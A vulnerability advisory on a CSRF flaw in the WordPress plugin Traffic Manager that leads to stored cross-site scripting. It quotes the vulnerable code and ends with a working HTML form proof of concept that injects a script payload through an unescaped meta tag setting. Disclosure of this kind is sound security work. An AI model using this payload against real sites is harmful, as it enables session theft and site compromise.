Cross-Site Request Forgery (CSRF)/Cross-Site Scripting (XSS) Vulnerability in Traffic Manager
We recently started proactively monitoring for evidence of some high risk vulnerabilities when changes are made to WordPress plugins and if we had more customers we could expand the proactive monitoring to more types of vulnerabilities. In doing that we sometimes find that the possible vulnerable code isn’t exploitable, but we find another vulnerability while figuring that out, which doesn’t speak to WordPress plugins being all that secure. That is the case with the plugin Traffic Manager, where while looking into a possible issues that occurred while saving the plugin’s settings that the changing of the plugin’s setting lacked protection against cross-site request forgery (CSRF).
The code to save the settings is in the function flush() in the file /core/parameters.class.php, which runs when accessing several of the plugin’s admin pages. Those pages all look to be restricted to Administrator, due to access to them requiring the “activate_plugins” capability, which only Administrators normally have access to.
The saving of the settings will occur if the POST input “submitOptions” exists:
616 | if (isset($_POST['submitOptions'])) { |
The settings are not sanitized when saved to the database and at least the “metatag_copyright_override” setting is output on frontend pages without being escaped (on line 414 of the file /traffic-manager.php):
414 | $dc .= '<meta name="DC.right" content="'.$this->get_param('metatag_copyright_override').'"/>'."\n" ; |
That permits cross-site scripting (XSS) to occur.
We notified the developer of the issue a couple of week ago, but have yet to hear back from them.
Proof of Concept
The following proof of concept will cause an alert box with any accessible cookies to be shown on frontend pages of the WordPress, when submitted as an Administrator.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin.php?page=traffic-manager/traffic-manager.php" method="POST"> <input type="hidden" name="submitOptions" value="update" /> <input type="hidden" name="metatag" value="on" /> <input type="hidden" name="metatag_copyright" value="on" /> <input type="hidden" name="metatag_copyright_override" value='"><script>alert(document.cookie);</script>' /> <input type="submit" value="Submit" /> </form> </body>
Timeline
- August 14, 2017 – Developer notified.